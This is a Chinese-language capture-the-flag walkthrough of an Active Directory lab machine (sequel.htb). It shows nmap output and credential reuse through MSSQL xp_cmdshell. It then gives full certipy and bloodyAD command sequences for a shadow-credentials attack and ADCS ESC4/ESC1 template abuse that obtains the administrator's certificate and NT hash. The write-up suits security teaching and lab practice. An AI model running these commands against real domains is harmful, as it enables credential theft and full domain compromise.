目录

USER

nmap扫描结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
┌──(hacker㉿kali)-[~/Desktop]
└─$ nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.94 ( https://nmap.org ) at 2025-01-17 11:13 CST
Nmap scan report for 10.10.11.51
Host is up (0.065s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|     root-servers
|     nstld
|_    verisign-grs
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-17 02:58:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-17T03:00:15+00:00; -15m47s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-17T03:00:15+00:00; -15m47s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-17T01:50:42
|_Not valid after:  2055-01-17T01:50:42
|_ssl-date: 2025-01-17T03:00:16+00:00; -15m46s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-17T03:00:16+00:00; -15m46s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-17T03:00:15+00:00; -15m47s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94%I=7%D=1/17%Time=6789CB08%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,6B,"\0i\0\x06\x85\x03\0\x01\0\0\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\0\0\x06\0\x01\0\0\x01\x87\0@\x01a\x0croot-servers\
SF:x03net\0\x05nstld\x0cverisign-grs\x03com\0x\xb39\x92\0\0\x07\x08\0\0\x0
SF:3\x84\0\t:\x80\0\x01Q\x80")%r(DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x02
SF:\0\0\0\0\0\0\0\0");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -15m46s, deviation: 0s, median: -15m47s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-17T02:59:40
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.48 seconds

用给定的用户rose : KxEPkKe6R8su登录可以用netexec的spider_plus来下载smb的内容:

1
2
3
4
5
6
7
8
9
10
11
12
$ netexec smb 10.10.11.51 -u rose -p KxEPkKe6R8su -M spider_plus -o DOWNLOAD_FLAG=True

SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
.......

在其中的一个xlsx文件中可以找到四个凭据,会发现sa是mssql2005的最高权限用户,我们能够登录,并且可以启用xp_cmdshell来执行命令,用nxc可以直接完成这个步骤,翻一下mssql的配置会发现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(hacker㉿kali)-[~/Desktop]
└─$ netexec mssql 10.10.11.51 -u sa -p MSSQLP@ssw0rd! --local-auth -x 'type C:\sql2019\ExpressAdv_ENU\sql-Configuration.INI '
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL       10.10.11.51     1433   DC01             [+] Executed command via mssqlexec
MSSQL       10.10.11.51     1433   DC01             [OPTIONS]
MSSQL       10.10.11.51     1433   DC01             ACTION="Install"
MSSQL       10.10.11.51     1433   DC01             QUIET="True"
MSSQL       10.10.11.51     1433   DC01             FEATURES=SQL
MSSQL       10.10.11.51     1433   DC01             INSTANCENAME="SQLEXPRESS"
MSSQL       10.10.11.51     1433   DC01             INSTANCEID="SQLEXPRESS"
MSSQL       10.10.11.51     1433   DC01             RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
MSSQL       10.10.11.51     1433   DC01             AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
MSSQL       10.10.11.51     1433   DC01             AGTSVCSTARTUPTYPE="Manual"
MSSQL       10.10.11.51     1433   DC01             COMMFABRICPORT="0"
MSSQL       10.10.11.51     1433   DC01             COMMFABRICNETWORKLEVEL=""0"
MSSQL       10.10.11.51     1433   DC01             COMMFABRICENCRYPTION="0"
MSSQL       10.10.11.51     1433   DC01             MATRIXCMBRICKCOMMPORT="0"
MSSQL       10.10.11.51     1433   DC01             SQLSVCSTARTUPTYPE="Automatic"
MSSQL       10.10.11.51     1433   DC01             FILESTREAMLEVEL="0"
MSSQL       10.10.11.51     1433   DC01             ENABLERANU="False"
MSSQL       10.10.11.51     1433   DC01             SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
MSSQL       10.10.11.51     1433   DC01             SQLSVCACCOUNT="SEQUEL\sql_svc"
MSSQL       10.10.11.51     1433   DC01             SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
MSSQL       10.10.11.51     1433   DC01             SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
MSSQL       10.10.11.51     1433   DC01             SECURITYMODE="SQL"
MSSQL       10.10.11.51     1433   DC01             SAPWD="MSSQLP@ssw0rd!"
MSSQL       10.10.11.51     1433   DC01             ADDCURRENTUSERASSQLADMIN="False"
MSSQL       10.10.11.51     1433   DC01             TCPENABLED="1"
MSSQL       10.10.11.51     1433   DC01             NPENABLED="1"
MSSQL       10.10.11.51     1433   DC01             BROWSERSVCSTARTUPTYPE="Automatic"
MSSQL       10.10.11.51     1433   DC01             IAcceptSQLServerLicenseTerms=True

WqSZAF6CysDQbGb3不能用来登录sql_svc(sa的winrm账户),但是查看一下远程登录用户:

1
2
3
4
5
6
7
8
9
10
└─$ netexec mssql 10.10.11.51 -u sa -p MSSQLP@ssw0rd! --local-auth -x 'net user '                                            
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL       10.10.11.51     1433   DC01             [+] Executed command via mssqlexec
MSSQL       10.10.11.51     1433   DC01             User accounts for \\DC01
MSSQL       10.10.11.51     1433   DC01             -------------------------------------------------------------------------------
MSSQL       10.10.11.51     1433   DC01             Administrator            ca_svc                   Guest
MSSQL       10.10.11.51     1433   DC01             krbtgt                   michael                  oscar
MSSQL       10.10.11.51     1433   DC01             rose                     ryan                     sql_svc
MSSQL       10.10.11.51     1433   DC01             The command completed successfully.

再把这个密码尝试一下会发现ryan能够登录了,就能直接读userflag

ROOT

这个靶场最有价值的就是ROOT的提权过程,之前在vintage用RBCD ABUSE去越权拿ST访问wmi,这个靶场展示了用cert来登录这种扩展的认证方式。

可以在上面的用户中看到一个ca_svc用户,这个用户与证书发布相关

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 [+] Response for object: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
LDAP        10.10.11.51     389    DC01             objectClass:         top person organizationalPerson user
LDAP        10.10.11.51     389    DC01             cn:                  Certification Authority
LDAP        10.10.11.51     389    DC01             sn:                  Authority
LDAP        10.10.11.51     389    DC01             givenName:           Certification
LDAP        10.10.11.51     389    DC01             distinguishedName:   CN=Certification Authority,CN=Users,DC=sequel,DC=htb
LDAP        10.10.11.51     389    DC01             instanceType:        4
LDAP        10.10.11.51     389    DC01             whenCreated:         20240609171347.0Z
LDAP        10.10.11.51     389    DC01             whenChanged:         20250117145728.0Z
LDAP        10.10.11.51     389    DC01             displayName:         Certification Authority
LDAP        10.10.11.51     389    DC01             uSNCreated:          102493
LDAP        10.10.11.51     389    DC01             memberOf:            CN=Cert Publishers,CN=Users,DC=sequel,DC=htb
LDAP        10.10.11.51     389    DC01             uSNChanged:          217726
LDAP        10.10.11.51     389    DC01             name:                Certification Authority
LDAP        10.10.11.51     389    DC01             objectGUID:          0x3e5e38923701e24c8c89ab65146f03fd
LDAP        10.10.11.51     389    DC01             userAccountControl:  66048
LDAP        10.10.11.51     389    DC01             badPwdCount:         0
LDAP        10.10.11.51     389    DC01             codePage:            0
LDAP        10.10.11.51     389    DC01             countryCode:         0
LDAP        10.10.11.51     389    DC01             badPasswordTime:     133815966012254481
LDAP        10.10.11.51     389    DC01             lastLogoff:          0
LDAP        10.10.11.51     389    DC01             lastLogon:           133815993200535683
LDAP        10.10.11.51     389    DC01             logonHours:          0xffffffffffffffffffffffffffffffffffffffffff
LDAP        10.10.11.51     389    DC01             pwdLastSet:          133815994488660666
LDAP        10.10.11.51     389    DC01             primaryGroupID:      513
LDAP        10.10.11.51     389    DC01             objectSid:           0x010500000000000515000000bd0bb4207c08fa390ad865d047060000
LDAP        10.10.11.51     389    DC01             accountExpires:      0
LDAP        10.10.11.51     389    DC01             logonCount:          2
LDAP        10.10.11.51     389    DC01             sAMAccountName:      ca_svc
LDAP        10.10.11.51     389    DC01             sAMAccountType:      805306368
LDAP        10.10.11.51     389    DC01             userPrincipalName:   ca_svc@sequel.htb
LDAP        10.10.11.51     389    DC01             servicePrincipalName: sequel.htb/ca_svc.DC01
LDAP        10.10.11.51     389    DC01             objectCategory:      CN=Person,CN=Schema,CN=Configuration,DC=sequel,DC=htb
LDAP        10.10.11.51     389    DC01             dSCorePropagationData: 20250117145728.0Z 20250117145728.0Z 20250117145501.0Z 20250117145443.0Z 16010101000000.0Z
LDAP        10.10.11.51     389    DC01             lastLogonTimestamp:  133815989421160719
LDAP        10.10.11.51     389    DC01             msDS-KeyCredentialLink: B:828:000200002000012551AC911785566D92739DD7308F933D2B9A240DC53F84E438EB85475862143E2000027BBF033A98F784BC9BD2A85ED5074C52053A9F7B4F488E3D69D9C0B29BBE689C1B01035253413100080000030000000001000000000000000000000100019543F4AFE802177FAF1218882F7FC2A0BDE09D7B4AF231FAF0C88B2BDC42A8A8CF09B9BA7AB3FBC253E763035C793C028542DB1FA8025CA8600550646066D4135AC4FC57303374855229697C7BF0BE2DC1AB482291A83B5FB8166D7DA9602B923472E6977318A2A8AE9CB2429626B9A54EE5226EDEDC36B3D979408643A24050BCAF9F822536F7B95BBD4526914C594C62F2D2926807F95A6FB884FB5E8136D5D78D9433DD2AECB40458602ACF477B6CA1C423324E4427E01BDF336B316B99911B7464955EC2F2B9274F307D97EA03D4598221C49514533B22994F3B02366B532983A4979D42FFF009A06FEBA4D4DA4542782F229BC06CC8B106903C87977C150100040101000500100006BD8468646F01524B276141D5E3F8E8940200070100080008E0F8C438F068DB01080009E0F8C438F068DB01:CN=Certification Authority,CN=Users,DC=sequel,DC=htb

msDS-KeyCredentialLink存储了序列化的用户数据,用于以cert为基础的认证,如果能够更改这个属性(自签名,让KDC有正确的公钥,能够验证证书信任链),那么就能够获得这个用户的TGT(shadow tickets),而获得了这个用户的TGT之后,向kdc发送U2U(self2self)的ST请求,kdc会把这个用户的NTML hash用之前生成的sessionKey加密之后发回客户端
(注意,不同于用密码获取TGT的传统方式,用cert来获取TGT的时候KDC会用请求者的公钥来加密sessionkey发送给请求者,因此即使不知道请求者的密码也可以获得sessionkey,原因是我们生成证书的时候伪造了公钥,私钥是我们控制的,sessionkey也可以知道。这是不同于传统方式的.以RC4加密为例,传统方式会用NTMLhash加密sessionkey,因此不知道密码无法获得sessionkey),这样我们就可以解密获取该账户的NTML HASH。 一定得是U2U,KDC会用请求的服务方的sessionkey来加密NTMLHASH,self2self情况下sessionkey是同一个

上面的过程被封装在certipy中,我们需要修改ca_svc的msDS-KeyCredentialLink属性,因此需要寻找一个对他有写权限的账户,bloodhound之后可以轻松发现ryan就可以
ryan可以改变ca_svc的owner,owner对管理范围内的用户具有修改DACL的权限

1
2
3
4
5
sudo timedatectl set-ntp false 
export u=ryan
export p=WqSZAF6CysDQbGb3
bloodyAD --host sequel.htb -d sequel.htb -u $u -p $p set owner ca_svc ryan  
certipy-ad shadow auto -u $u@sequel.htb -p $p -dc-ip 10.10.11.51 -ns 10.10.11.51 -target 10.10.11.51 -account ca_svc

certipy-ad shadow….会直接获取到ca_svc的NTML HASH,远离就是之前所说的

扫描AD CS的漏洞:

1
2
export KRB5CCNAME=$PWD/ca_svc.ccache
certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

会发现DunderMifflinAuthentication这个certificate template满足ESC4的触发条件,而ESC4就是有我们能够控制的账户能够修改certificate template,修改三个属性后能够
实施ESC1攻击,也就是我们控制的账户可以代替其它所有账户请求它们的cert,包括administrator,然后可以用administrator的cert请求TGT从而获取它的NThash( self2self,和之前一样)

1
2
3
4
5
export nt=3b181b914e7a9d5508ea1e20bc2b7fce
export KRB5CCNAME=$PWD/ca_svc.ccache
certipy-ad template -k -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -target dc01.sequel.htb
certipy-ad req -u ca_svc -hashes $nt -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug
certipy-ad auth -pfx administrator_10.pfx  -domain sequel.htb

用pfx证书来获取NTLM HASH后就可以winrm登录获取root flag